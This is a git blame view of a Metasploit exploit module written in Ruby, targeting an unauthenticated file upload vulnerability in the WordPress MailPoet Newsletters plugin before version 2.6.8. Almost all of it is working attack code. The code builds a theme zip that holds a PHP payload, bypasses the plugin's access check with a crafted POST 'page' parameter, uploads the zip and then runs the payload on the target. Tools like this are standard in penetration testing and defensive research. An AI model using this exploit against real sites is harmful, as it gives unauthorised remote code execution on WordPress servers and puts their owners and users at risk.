metasploit-framework/modules/exploits/unix/webapp/wp_wysija_newsletters_uploa...

118 lines
4.6 KiB
Ruby
Raw Normal View History

2014-07-02 08:24:27 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-07-02 08:24:27 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2014-07-02 08:24:27 +00:00
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
2014-07-03 17:25:31 +00:00
include Msf::Exploit::FileDropper
2014-07-02 08:24:27 +00:00
def initialize(info = {})
2014-07-18 19:58:33 +00:00
super(update_info(
info,
'Name' => 'Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload',
2014-07-02 08:24:27 +00:00
'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
functionality to upload a zip file containing the payload. The plugin uses the
admin_init hook, which is also executed for unauthenticated users when accessing
a specific URL. The first fix for this vulnerability appeared in version 2.6.7,
but the fix can be bypassed. In PHP's default configuration,
a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
uses $_REQUEST to check for access rights. By setting the POST parameter to
something not beginning with 'wysija_', the check is bypassed. Wordpress uses
2014-07-18 20:15:56 +00:00
the $_GET array to determine the page, so it is not affected by this. The developers
applied the fixes to all previous versions too.
2014-07-02 08:24:27 +00:00
},
'Author' =>
[
2014-07-02 08:35:30 +00:00
'Marc-Alexandre Montpas', # initial discovery
2014-07-02 08:24:27 +00:00
'Christian Mehlmauer' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
2014-07-18 19:58:33 +00:00
['URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html'],
['URL', 'http://www.mailpoet.com/security-update-part-2/'],
2014-10-02 21:03:31 +00:00
['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php'],
2014-10-03 15:13:18 +00:00
['WPVDB', '6680']
2014-07-02 08:24:27 +00:00
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
2014-07-18 19:58:33 +00:00
'Targets' => [['wysija-newsletters < 2.6.8', {}]],
2014-07-02 08:24:27 +00:00
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 1 2014'))
end
def create_zip_file(theme_name, payload_name)
# the zip file must match the following:
# -) Exactly one folder representing the theme name
# -) A style.css in the theme folder
# -) Additional files in the folder
content = {
::File.join(theme_name, 'style.css') => '',
::File.join(theme_name, payload_name) => payload.encoded
2014-07-02 08:24:27 +00:00
}
zip_file = Rex::Zip::Archive.new
2014-07-18 19:58:33 +00:00
content.each_pair do |name, con|
zip_file.add_file(name, con)
2014-07-02 08:24:27 +00:00
end
2014-07-03 17:25:31 +00:00
2014-07-02 08:24:27 +00:00
zip_file.pack
end
def check
check_plugin_version_from_readme('wysija-newsletters', '2.6.8')
2014-07-02 08:24:27 +00:00
end
def exploit
2014-07-03 18:27:08 +00:00
theme_name = rand_text_alpha(10)
payload_name = "#{rand_text_alpha(10)}.php"
2014-07-02 08:24:27 +00:00
zip_content = create_zip_file(theme_name, payload_name)
data = Rex::MIME::Message.new
2014-07-03 18:27:08 +00:00
data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
2014-07-02 08:24:27 +00:00
data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
data.add_part('themeupload', nil, nil, 'form-data; name="action"')
data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
2014-07-18 20:15:56 +00:00
# this line bypasses the check implemented in version 2.6.7
data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
2014-07-02 08:24:27 +00:00
post_data = data.to_s
payload_uri = normalize_uri(target_uri.path, wp_content_dir, 'uploads', 'wysija', 'themes', theme_name, payload_name)
2014-07-02 08:24:27 +00:00
print_status("Uploading payload to #{payload_uri}")
2014-07-18 19:58:33 +00:00
res = send_request_cgi(
2014-07-02 08:24:27 +00:00
'method' => 'POST',
2015-01-31 21:02:44 +00:00
'uri' => wordpress_url_admin_post,
2014-07-02 08:24:27 +00:00
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
'data' => post_data
2014-07-18 19:58:33 +00:00
)
2014-07-02 08:24:27 +00:00
2014-07-03 17:25:31 +00:00
if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
2014-07-02 08:24:27 +00:00
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end
2014-07-03 17:25:31 +00:00
# Files to cleanup (session is dropped in the created folder):
# style.css
# the payload
# the theme folder (manual cleanup)
register_files_for_cleanup('style.css', payload_name)
print_warning("The theme folder #{theme_name} can not be removed. Please delete it manually.")
2014-07-03 17:25:31 +00:00
print_status("Executing payload #{payload_uri}")
2014-07-18 19:58:33 +00:00
send_request_cgi(
2014-07-02 08:24:27 +00:00
'uri' => payload_uri,
'method' => 'GET'
2014-07-18 19:58:33 +00:00
)
2014-07-02 08:24:27 +00:00
end
2014-07-05 18:51:12 +00:00
end